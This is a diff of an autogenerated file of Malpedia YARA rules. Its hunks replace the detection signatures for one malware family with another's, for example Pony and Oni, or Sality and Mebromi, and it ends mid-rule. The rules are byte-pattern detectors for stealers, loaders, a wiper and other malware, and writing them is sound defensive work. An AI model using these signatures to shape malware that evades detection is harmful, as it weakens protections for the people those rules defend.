"FILE" @@ -131649,32 +134250,32 @@ rule MALPEDIA_Win_Purplewave_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8d4da4 c645fc12 e8???????? 84db 0f84ca020000 6a40 } - $sequence_1 = { 0f8415000000 81a53cffffffffbfffff 8d8da8feffff e9???????? c3 8d8d60feffff e9???????? } - $sequence_2 = { 8d8c2468010000 e8???????? 6a0d e8???????? 59 56 8bd0 } - $sequence_3 = { 6bc838 57 8b0495201e4900 8a440828 a848 757b 84c0 } - $sequence_4 = { 8d4dbc e8???????? 8d4dd4 e8???????? 8bc3 e8???????? c20c00 } - $sequence_5 = { b8???????? e8???????? 8bf9 8db78c000000 8bce e8???????? 84c0 } - $sequence_6 = { 53 50 e8???????? 83c40c 8d8db8feffff e8???????? 8d95b8feffff } - $sequence_7 = { 53 68???????? 50 ff5110 ff758c ffd6 50 } - $sequence_8 = { 0f85d3000000 8d45e8 50 8b06 8b08 83c128 } - $sequence_9 = { 84c0 750e 8d45d8 50 8d4e6c e8???????? eb49 } + $sequence_0 = { 90 4883bc244001000008 720d 488b8c2428010000 e8???????? 4881c420020000 415e } + $sequence_1 = { c68424b400000061 4488a424b5000000 c68424b600000064 c68424b70000006c 4488ac24b8000000 c68424b900000046 c68424ba00000072 } + $sequence_2 = { 488b8c2400010000 e8???????? e9???????? 4889442420 4d8bcc 4c8b8424f8010000 488bd6 } + $sequence_3 = { 57 488bc4 4883ec58 48c7442420feffffff 498bd8 488bf9 } + $sequence_4 = { 668944243a 668944243c 668944243e 6689442440 488d542420 488bcf 66c74424420000 } + $sequence_5 = { 3d5a290000 7307 b801000000 eb0a 3d39380000 1bc0 83c003 } + $sequence_6 = { 66c7803effffff4c00 66b85300 6689842418010000 66c784241a0100004100 6644899c241c010000 66c784241e0100004900 66c78424200100007300 } + $sequence_7 = { 4157 4881ec88000000 33ff 498be8 488bf1 4c8bfa } + $sequence_8 = { 3d401f0000 7309 8d7b20 448d6b18 eb1b 3db8240000 730b } + $sequence_9 = { 488d8c24ca000000 e8???????? c684249003000044 c68424910300008b c684249203000001 c684249303000044 c684249403000039 } condition: - 7 of them and filesize <1400832 + 7 of them and filesize <471040 } -rule MALPEDIA_Win_Prilex_Auto : FILE +rule MALPEDIA_Win_Taurus_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "33d37f97-5d7f-5370-b6c1-4299d7c65706" + id = "1d04f49a-1251-5bc9-a2e1-54ed739ba752" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.prilex_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.taurus_stealer_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "3845b326ac2cf1def622498895bf69526e3d4fb73889990b08fc4c5071c0498b" + logic_hash = "5a56120ca5bf111c092d7e02323e7c3983f49990178f81f0fd9b64062b85cfef" score = 75 quality = 75 tags = "FILE" @@ -131688,32 +134289,32 @@ rule MALPEDIA_Win_Prilex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8be8 ffd7 8d442410 8d4c2414 } - $sequence_1 = { 8b0f 51 ff15???????? 8945e4 68???????? } - $sequence_2 = { 8d442424 6a0c 8b11 50 52 56 } - $sequence_3 = { e8???????? 5d 8d4c2420 8d542414 51 } - $sequence_4 = { ff15???????? c745fc02000000 8b4510 33c9 833800 0f95c1 } - $sequence_5 = { 8d858cfdffff 52 8d8d9cfdffff 50 51 } - $sequence_6 = { 83c104 898d24ffffff c7851cffffff03400000 8d951cffffff 52 8d458c 50 } - $sequence_7 = { 8d8dacfdffff 68???????? 52 898d54fdffff c7854cfdffff08400000 } - $sequence_8 = { e8???????? 8bf0 ff15???????? 8d45ac } - $sequence_9 = { ffd6 50 8d4da0 68???????? 51 ffd6 } + $sequence_0 = { 56 8b7508 eb12 8d4e1c e8???????? 8bce e8???????? } + $sequence_1 = { 8d4de8 e8???????? 85f6 7408 8d4dd0 e8???????? 8b4508 } + $sequence_2 = { 88550f 88450e 8d450e 51 50 8d4d8c e8???????? } + $sequence_3 = { 51 50 8bce e8???????? 8d4dcc e8???????? 8d4db4 } + $sequence_4 = { 7305 8a5df3 ebf1 8d45f4 c645ff00 50 8bd6 } + $sequence_5 = { 8bc2 c1e802 c1e103 8b0483 d3e8 880432 42 } + $sequence_6 = { 8d4ddc e8???????? 8d4d90 e8???????? 8d4d84 e8???????? } + $sequence_7 = { c74610fe33b90f c7461465dc040b c74618e3804800 c7461cb5492c0d c7462045909c0f c74624dd90c504 c7462870e8f00e } + $sequence_8 = { 0f1145c1 885ddf 0fbe4581 250f000080 7905 48 83c8f0 } + $sequence_9 = { 40 83f806 7305 8a5df2 ebf1 8d45f3 c645f900 } condition: - 7 of them and filesize <450560 + 7 of them and filesize <524288 } -rule MALPEDIA_Win_Pony_Auto : FILE +rule MALPEDIA_Win_Oni_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d90fd047-9438-55a9-9e35-1d6c2ea6d18d" + id = "ffe7d6a1-e7f2-579d-b056-7e9412d8f38a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pony_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oni_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "8fcd4026be1a9e152c2bd589ec65b90e934cc06d61e86dd6cd06c58ac6d41a1e" + logic_hash = "ef51460421d5bc54251bcf8ac5edcdde6a15b31e2116a2189b470d64d9b9ae34" score = 75 quality = 75 tags = "FILE" @@ -131727,32 +134328,32 @@ rule MALPEDIA_Win_Pony_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c20400 55 89e5 83ec18 53 } - $sequence_1 = { c745f400000000 8d45f8 50 ff7508 6a00 ff15???????? } - $sequence_2 = { bfffffffff 33f9 0bf8 33fb 8d941792cc0c8f 03560c } - $sequence_3 = { ff75e8 ff7508 e8???????? 23d8 ff75ec e8???????? } - $sequence_4 = { f7d0 50 ff7508 e8???????? c9 c20400 } - $sequence_5 = { ff7514 e8???????? eb0d 68???????? } - $sequence_6 = { c9 c20400 55 8bec 83c4fc ff7514 ff7510 } - $sequence_7 = { ff75c8 e8???????? ff75c4 e8???????? ff75bc } - $sequence_8 = { b9ffffffff f2ae 3807 75c5 6a1a ff7508 } - $sequence_9 = { e8???????? ff7510 6a18 ff7508 e8???????? ff7510 } + $sequence_0 = { 50 8d4db0 c645b000 e8???????? 8b0d???????? b8abaaaa2a 8b3d???????? } + $sequence_1 = { 83f904 0f828d000000 83f923 0f8789000000 8bc8 } + $sequence_2 = { ff75ec 51 ff36 8b55e8 8bcb e8???????? 83c410 } + $sequence_3 = { 7f07 3bc7 0f4fd8 8bfb 6aff 8d4701 } + $sequence_4 = { 3a45ec 753e 8b45f0 8b048590884300 } + $sequence_5 = { 8d0dc0254300 ba1b000000 e9???????? a900000080 } + $sequence_6 = { 660fd685c8feffff 33ff 6800010000 899dc8feffff 89bdccfeffff 899dd0feffff ff15???????? } + $sequence_7 = { 8901 0fb602 5f 5e 5b 8b4c2430 33cc } + $sequence_8 = { 8b542428 8b442414 85f6 0f8422ffffff } + $sequence_9 = { f6c104 7519 f6c102 8d4df8 7540 eb6a } condition: - 7 of them and filesize <262144 + 7 of them and filesize <499712 } -rule MALPEDIA_Win_Rockloader_Auto : FILE +rule MALPEDIA_Win_Unidentified_098_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "175eaa7b-da5b-50b8-b46d-cecd53211dcf" + id = "8f47cad5-b04b-526a-bf75-a80f46978296" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rockloader_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_098" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_098_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "8a75e6c1f9302fef80e04ef409ea5d10afc0d829be15769e71fe72b02405b4ff" + logic_hash = "5873ddf57107eab8629c385b87e703377b84a728d15aa8f227623b130059db6e" score = 75 quality = 75 tags = "FILE" @@ -131766,34 +134367,34 @@ rule MALPEDIA_Win_Rockloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? dc1d???????? dfe0 f6c441 740f } - $sequence_1 = { e8???????? 85c0 74b4 c6002c 40 837d0c00 7404 } - $sequence_2 = { 8a06 3c22 750c ff7508 8bc6 e8???????? } - $sequence_3 = { 8b45f4 8945e8 8d45f8 50 8d45e4 } - $sequence_4 = { eb05 68???????? e8???????? 8bf8 8bc7 } - $sequence_5 = { e8???????? 33f6 53 8975f8 } - $sequence_6 = { 3975f4 7e55 53 8b45f8 } - $sequence_7 = { ff4608 8b7f08 85ff 7452 8b4508 } - $sequence_8 = { d9ee 53 56 dd55ec d9e8 33f6 } - $sequence_9 = { 8975f8 db45f8 8365f800 dec1 dd5ddc 9b } + $sequence_0 = { c644247f00 e9???????? 41bdffffffff 4885db 7412 488b4310 483b4318 } + $sequence_1 = { e9???????? 8d48bf 83f905 0f8716ffffff 83e837 c1e00c 89c6 } + $sequence_2 = { 7eac 85c0 78a8 488b4318 31d2 4885c0 75ab } + $sequence_3 = { f6c202 410f45c0 4883c102 01d2 668941fe 4939c9 75ce } + $sequence_4 = { b801000000 4d85c0 7486 488b542450 4c89e1 e8???????? 85c0 } + $sequence_5 = { ff15???????? 410fb61424 e9???????? 4c89f8 4829d8 4801c7 4d85ed } + $sequence_6 = { 85d2 0f88d5000000 4c8d5904 4189d2 4c8d4910 83fa0f 7e33 } + $sequence_7 = { 488d542440 4939d4 7411 4c89e1 8844242f e8???????? 0fb644242f } + $sequence_8 = { 897c2450 41bd01000000 44894c2434 4889442458 e9???????? 488b03 4489442434 } + $sequence_9 = { e9???????? 498b4610 493b4618 0f838d010000 0fb700 6683f8ff b900000000 } condition: - 7 of them and filesize <98304 + 7 of them and filesize <3345408 } -rule MALPEDIA_Win_Sality_Auto : FILE +rule MALPEDIA_Win_Mebromi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c4fe3bef-4213-5d7d-913a-2b05b77a4928" + id = "e0d98380-a60b-51d2-98f3-302d440340e7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sality_auto.yar#L1-L213" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mebromi_auto.yar#L1-L125" license_url = "N/A" - logic_hash = "0193eaeac2f20f17789979ee8ced6eebd2afd20c9546863e594d136342d3a2ff" + logic_hash = "4361b37a1cf79aacd380ae78b2f2e74bbc44d101b09510c6583cf0529e44be88" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -131805,48 +134406,34 @@ rule MALPEDIA_Win_Sality_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0302 50 6878563412 e8???????? } - $sequence_1 = { 0255fc 8855ec 8b45ec 25ff000000 } - $sequence_2 = { 02040a 8845fc 8b4dfc 81e1ff000000 } - $sequence_3 = { 0302 50 6a00 e8???????? } - $sequence_4 = { 837da000 751b 8b551c 52 8b4514 50 8b4d10 } - $sequence_5 = { 02c8 884dec 8b55f0 83c201 } - $sequence_6 = { 0311 52 6878563412 e8???????? } - $sequence_7 = { 0302 8945fc 8b4d10 8b55fc } - $sequence_8 = { 52 50 ff9539154000 58 6a00 } - $sequence_9 = { 8b5678 0354240c 8b5a20 035c240c 33c0 8b3b } - $sequence_10 = { 240f 3c0a 1c69 2f 8803 43 } - $sequence_11 = { f3a6 61 7513 8bc2 83e804 8b00 } - $sequence_12 = { eb0c 58 e8???????? b801000000 c3 } - $sequence_13 = { 7461 8bc8 48 c6857b27400000 } - $sequence_14 = { 8b00 0344240c eb02 33c0 } - $sequence_15 = { ff95bc154000 85c0 7415 58 } - $sequence_16 = { 010d???????? 83c004 5f 5e } - $sequence_17 = { 0007 7307 c607ff 8ac1 } - $sequence_18 = { 031e ff7608 ff7604 e8???????? } - $sequence_19 = { 00fb fb 804880bc 280d???????? } - $sequence_20 = { 0306 50 8d5604 e8???????? } - $sequence_21 = { 0306 50 8b4e04 8d5608 } - $sequence_22 = { 0202 7466 0fb77202 8b7a04 } - $sequence_23 = { 014304 c3 53 56 } + $sequence_0 = { 743a 837d0800 742e 85f6 7419 0fb6da f68301a0290004 } + $sequence_1 = { 68ff010f00 68???????? ff742410 ff15???????? 8bf0 85f6 7416 } + $sequence_2 = { 7714 8b55fc 8a9270722900 089001a02900 } + $sequence_3 = { 683f000f00 55 55 ff15???????? 8bf0 e8???????? 56 } + $sequence_4 = { 48 750c e8???????? eb05 e8???????? 6a01 } + $sequence_5 = { 0fb6fa 3bc7 7714 8b55fc 8a9270722900 089001a02900 } + $sequence_6 = { 2c29 0000 2d29008a46 0323 d18847034ec1 e9???????? } + $sequence_7 = { 0fb6d2 f68201a0290004 740c ff01 } + $sequence_8 = { aa 8d9e88722900 803b00 8bcb 742c 8a5101 84d2 } + $sequence_9 = { 50 6a01 56 ff15???????? 56 8bf8 ff15???????? } condition: - 7 of them and filesize <1523712 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Unidentified_081_Auto : FILE +rule MALPEDIA_Win_Oldbait_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4bef4e35-3450-5f50-98ad-424279417112" + id = "ebf9fc57-4949-58c7-824e-3ca5b4d74ce5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_081_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oldbait_auto.yar#L1-L228" license_url = "N/A" - logic_hash = "0bf113d92abe743278ae5a94b3d8f7a48f5ba7f91d2e79f1d3ac361b6c786f4e" + logic_hash = "d1cd1bc5ec310d79468f4c2de84867d1b6cb0114c1b0bc749b36388cf16e7127" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -131858,32 +134445,46 @@ rule MALPEDIA_Win_Unidentified_081_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8985c8fdffff 83f808 0f84ab090000 83f807 0f8777090000 ff24854fa44000 33c0 } - $sequence_1 = { c74518f0944100 50 8d4dc4 e8???????? 68???????? 8d45c4 } - $sequence_2 = { 68???????? b9???????? e8???????? c645fc03 33c0 } - $sequence_3 = { eb02 33c0 8bbdc8fdffff 6bc009 0fb6bc38e8544100 8bc7 89bdc8fdffff } - $sequence_4 = { 8b7508 c7465c48554100 83660800 33ff } - $sequence_5 = { c645fc01 33c9 66a3???????? 66390d???????? 8bc6 c705????????07000000 0f44c1 } - $sequence_6 = { 88440a34 8b049dd0d14100 c744023801000000 e9???????? ff15???????? 8bf8 } - $sequence_7 = { 83e61f c1f805 c1e606 8b0485d0d14100 80643004fd 8b45f8 } - $sequence_8 = { 6a01 6a00 f7d8 50 53 ff15???????? 8b8d34ffffff } - $sequence_9 = { ff15???????? 837c241001 7507 b101 e8???????? 8b35???????? } + $sequence_0 = { 05d4db1900 8945f4 ff35???????? ff75fc ff55f4 5f 5e } + $sequence_1 = { 8bec 8b450c 56 33d2 57 } + $sequence_2 = { 33d2 57 8b7d08 8d70ff 85f6 7626 } + $sequence_3 = { 01459c 8b45c8 8945f8 eb05 } + $sequence_4 = { 69c061ea0000 3571281424 42 3bd6 894510 72da } + $sequence_5 = { 0145d8 8bb54cffffff 56 ff55d0 } + $sequence_6 = { 0145d8 33ff 8d837ff61800 803800 } + $sequence_7 = { 0145d8 8b45f0 ff45ec 0fb64004 } + $sequence_8 = { 0531b11800 50 8b45f8 0531010000 50 } + $sequence_9 = { 0145d4 41 c1ea04 75dc } + $sequence_10 = { 837d2000 7432 66c7045f0d00 43 66c7045f0a00 43 } + $sequence_11 = { 0145d8 8b45d8 3b45c8 7cc2 } + $sequence_12 = { 83e107 d3e8 30043a 8b4510 69c061ea0000 3571281424 42 } + $sequence_13 = { 6a40 6800300000 68d4fd1900 6a00 } + $sequence_14 = { 894510 72da 8bc7 5f 5e } + $sequence_15 = { 0103 01451c 8b06 8bc8 c1e906 } + $sequence_16 = { 8b55fc 8a5d0f 8d4701 83e007 02d9 } + $sequence_17 = { 7439 8d85bcfdffff 68???????? 50 } + $sequence_18 = { ffd6 68???????? 53 8945f0 ffd6 6a64 } + $sequence_19 = { 50 e8???????? ff75f4 8d8578ffffff 68???????? } + $sequence_20 = { ffd6 ffd0 8d85c0feffff 50 8d85bcfdffff } + $sequence_21 = { 8945ec ff7508 6a01 6a00 6a00 } + $sequence_22 = { 8d4df4 8945d4 51 57 50 } + $sequence_23 = { 57 50 53 68???????? ff35???????? ffd6 ffd0 } condition: - 7 of them and filesize <273408 + 7 of them and filesize <172032 } -rule MALPEDIA_Win_Satan_Auto : FILE +rule MALPEDIA_Win_Dubrute_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ddfd46bc-87c6-53ce-9595-be9a6a99e4e0" + id = "91c95b88-1aba-547d-a2e7-1c5fddf4a9b5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.satan_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dubrute_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "6170986a4237acbed4cbbf775dbbfb72e2b63776fab2b68ba052c6ad44853238" + logic_hash = "96123f7850603b9e3ec4473b7e8755ea7a00903c8750eba6148228fb5b3de4ca" score = 75 quality = 75 tags = "FILE" @@ -131897,32 +134498,32 @@ rule MALPEDIA_Win_Satan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8be5 5d c20800 8b45e4 c745b800000000 c745bc00000000 } - $sequence_1 = { 52 ff15???????? 8b4508 8b0c85e8c24700 83e102 740d 8d95e4dfffff } - $sequence_2 = { ffb5c4e7ffff 8985a0e7ffff ffb5bce7ffff c745ec04000000 } - $sequence_3 = { 57 50 8d45f4 64a300000000 8d4dd0 e8???????? } - $sequence_4 = { e8???????? 8b85acfeffff 83f810 7212 40 6a01 } - $sequence_5 = { eb9b 8b4dfc c1f906 8b55fc 83e23f 6bc230 03048d40e04700 } - $sequence_6 = { e8???????? 8845dc c745fc01000000 84c0 0f84b3010000 8d45d0 50 } - $sequence_7 = { 8d0c8584d64700 51 e8???????? 83c408 } - $sequence_8 = { 64a300000000 68b8000000 8d8598fdffff 6a00 50 e8???????? 68???????? } - $sequence_9 = { 8b5508 83e23f 6bd230 8b0c8d40e04700 8844112d 8b45ec d1e0 } + $sequence_0 = { 8d45dc dd5de4 50 c645fc0d ff15???????? 8d4df0 c645fc08 } + $sequence_1 = { 83c410 83f8ff 743b 85c0 741c 03f0 56 } + $sequence_2 = { 83e906 7426 49 741a 49 740e 49 } + $sequence_3 = { 7427 48 7413 48 48 7551 57 } + $sequence_4 = { 5e 5d c3 8b4c2408 81f9ff000000 7e1b 8b442404 } + $sequence_5 = { e8???????? 83c410 ff866c090000 5e c3 55 8bec } + $sequence_6 = { 7520 8b06 8b4018 8b00 ff30 e8???????? 6a06 } + $sequence_7 = { 57 53 ff15???????? 8b3d???????? 8325????????00 8b37 3bf7 } + $sequence_8 = { 56 53 68???????? e8???????? 83c40c 837d1400 } + $sequence_9 = { 8a48ff 884e01 83c603 837df000 7fd4 e9???????? f745f0f8ffffff } condition: - 7 of them and filesize <1163264 + 7 of them and filesize <598016 } -rule MALPEDIA_Win_Grimagent_Auto : FILE +rule MALPEDIA_Win_Asruex_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "228d515c-640e-56ca-8602-96023167bb1e" + id = "899abd0f-c835-5f70-819c-92570cc9b462" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.grimagent_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.asruex_auto.yar#L1-L112" license_url = "N/A" - logic_hash = "96dca74317029a89173373ec308b352cf5e1c63ce0e2aa5c10efcec2082d0995" + logic_hash = "a14db0e4e44f1156fe16afe843345aa29b9b1f1eb3cc060b10e0bcdf06eb97d4" score = 75 quality = 75 tags = "FILE" @@ -131936,32 +134537,32 @@ rule MALPEDIA_Win_Grimagent_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 55 8bec 83ec18 c745f400000000 c745f800000000 c745e800000000 8b4508 } - $sequence_1 = { ebbe 8b550c 8955fc 8b450c 50 e8???????? } - $sequence_2 = { 0fb711 3bc2 7514 8b45ec 83c002 } - $sequence_3 = { 8b4dfc 0fb711 3bc2 7514 } - $sequence_4 = { 8b4508 50 e8???????? 83c404 3945f4 0f8394000000 8b4df0 } - $sequence_5 = { 0fb708 3bd1 7576 8b55f0 8955ec c745f800000000 eb09 } - $sequence_6 = { 83ec0c 8b450c 8945f8 c745fc00220400 8b4dfc } - $sequence_7 = { 8bec 8b4508 0fbe08 85c9 7426 8b5508 } - $sequence_8 = { c745e801000000 b801000000 eb1a 8b4df0 } - $sequence_9 = { 83c404 3945f8 750e c745e801000000 b801000000 } + $sequence_0 = { 85c0 740e 85ed 740a } + $sequence_1 = { 7408 3c0d 7404 3c0a 7516 } + $sequence_2 = { 83f801 740e 83f803 7409 83f802 } + $sequence_3 = { ff15???????? 85c0 7407 3d14270000 } + $sequence_4 = { 740c 3c09 7408 3c0d 7404 3c0a 7516 } + $sequence_5 = { 7404 3c58 7505 bb01000000 } + $sequence_6 = { 3c09 7408 3c0d 7404 3c0a 7516 } + $sequence_7 = { 3c78 7404 3c58 7505 bb01000000 } + $sequence_8 = { 3c0d 7404 3c0a 7516 } + $sequence_9 = { e8???????? 83f8ff 7407 3d0000a000 } condition: - 7 of them and filesize <582656 + 7 of them and filesize <1564672 } -rule MALPEDIA_Win_Freenki_Auto : FILE +rule MALPEDIA_Win_Bruh_Wiper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "96c9c22a-8c0f-508a-9c8b-2adc585b1381" + id = "8004678f-c7f1-56db-b368-30e9334ba4b0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.freenki_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bruh_wiper_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "ea73b0cd02f4881d245e91a02d5574d630e230bb3618aadd7337accb2e33b167" + logic_hash = "26b32a2c0d923fc99fb91e4beb18e36e72d9c523fef8bdb0bb63ddd5fd11ff5a" score = 75 quality = 75 tags = "FILE" @@ -131975,34 +134576,34 @@ rule MALPEDIA_Win_Freenki_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e03f 6bc830 8b049578394200 c644082801 897de4 c745fcfeffffff } - $sequence_1 = { 57 e8???????? 83c404 ff75f8 e8???????? 8bf8 } - $sequence_2 = { f7d9 0bc8 51 53 e8???????? ffb504e7ffff 8bd8 } - $sequence_3 = { 68???????? 50 ff5110 8b55b8 8b4dcc 2bd1 0f1f440000 } - $sequence_4 = { 6bd830 8b04bd78394200 f644032801 7444 837c0318ff 743d e8???????? } - $sequence_5 = { e8???????? 8b3d???????? 33db 0f1f8000000000 8d853cd4ffff 50 } - $sequence_6 = { 64a300000000 8bf1 89b5e4edffff 33c0 c785c0edffff00000000 } - $sequence_7 = { 6bce4c 53 0f100419 0f1100 e8???????? 8b4dfc 83c404 } - $sequence_8 = { 68???????? ffb5e0f9ffff ff15???????? f7d8 5e } - $sequence_9 = { dd00 ebc6 c745e0b8de4100 e9???????? c745e0c0de4100 e9???????? } + $sequence_0 = { e8???????? 83c40c be01080000 0f1f8000000000 } + $sequence_1 = { 83ee01 75e3 8b4dfc 5f 5e } + $sequence_2 = { 8d45f4 57 50 ff15???????? ff15???????? } + $sequence_3 = { 68b40200c0 ffd6 8b4dfc 5f 33cd 5e } + $sequence_4 = { 6a00 8d85f8fdffff 50 6800020000 8d85fcfdffff 50 } + $sequence_5 = { 68???????? 57 ffd3 6800020000 8d85fcfdffff 6a00 } + $sequence_6 = { 50 ffd6 8bf0 8d45fb 50 6a00 6a01 } + $sequence_7 = { 6800200000 68???????? 57 ffd3 6800020000 8d85fcfdffff } + $sequence_8 = { e8???????? 83c40c be01080000 0f1f8000000000 6a00 } + $sequence_9 = { 50 ffd6 68???????? 68???????? 8bf8 } condition: - 7 of them and filesize <327680 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Blacklotus_Auto : FILE +rule MALPEDIA_Win_Virlock_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "84ef9a0b-6544-5450-8b66-292ec2ba5dbd" + id = "a53ad870-36e8-5483-a3c7-250260a5d06b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blacklotus_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.virlock_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "94ccc2d7ff61cb6463b78893aadb2549c584433629bcbab33ca8298790f40cde" + logic_hash = "2251c81b77f733b642183ccf22ad3a25fb0df2e83278219ff44fcff0baf92b0d" score = 75 - quality = 75 + quality = 69 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -132014,34 +134615,34 @@ rule MALPEDIA_Win_Blacklotus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 443bca 7319 69c03f000100 4883c102 4103c0 41ffc1 440fb701 } - $sequence_1 = { c745cfc1afbd03 c745d301138a6b c745d73a911141 c745db4f67dcea c745df97f2cfce } - $sequence_2 = { 448bc6 488d155b1d0000 488bcb e8???????? 488bf0 } - $sequence_3 = { 770b 418b4908 03ca 413bcb 770e 6641ffc2 4983c128 } - $sequence_4 = { 42883c10 4183fb3c 0f8c45ffffff 498d8af0000000 41b810000000 498bd6 } - $sequence_5 = { 488d1588f7ffff e8???????? 488b05???????? 488bcb ff5020 488b5c2430 488b742438 } - $sequence_6 = { 4632440c30 eb1b 418af1 83f804 } - $sequence_7 = { 4889442428 4c8bc5 488bd3 48897c2420 } - $sequence_8 = { 740b 4883c602 483bf7 72bd eb0c bb03000000 eb05 } - $sequence_9 = { 48897010 48897818 4c897020 55 488d68c8 4881ec30010000 4c8bd1 } + $sequence_0 = { e8???????? e8???????? ff15???????? 61 3bcb 7532 60 } + $sequence_1 = { 9d cde6 81b4e570805c4af32b0cf0 e602 a4 b592 9c } + $sequence_2 = { 68???????? eb0a 68???????? 68???????? e8???????? 83fa00 751b } + $sequence_3 = { 81f2???????? 81f35e473bfc 81f308f661fc 81f37dc97000 e8???????? bb8aedf4f9 baf2edecff } + $sequence_4 = { 45 58 58 46 54 4f 53 } + $sequence_5 = { eb07 3106 83c604 ebea 83f901 754a } + $sequence_6 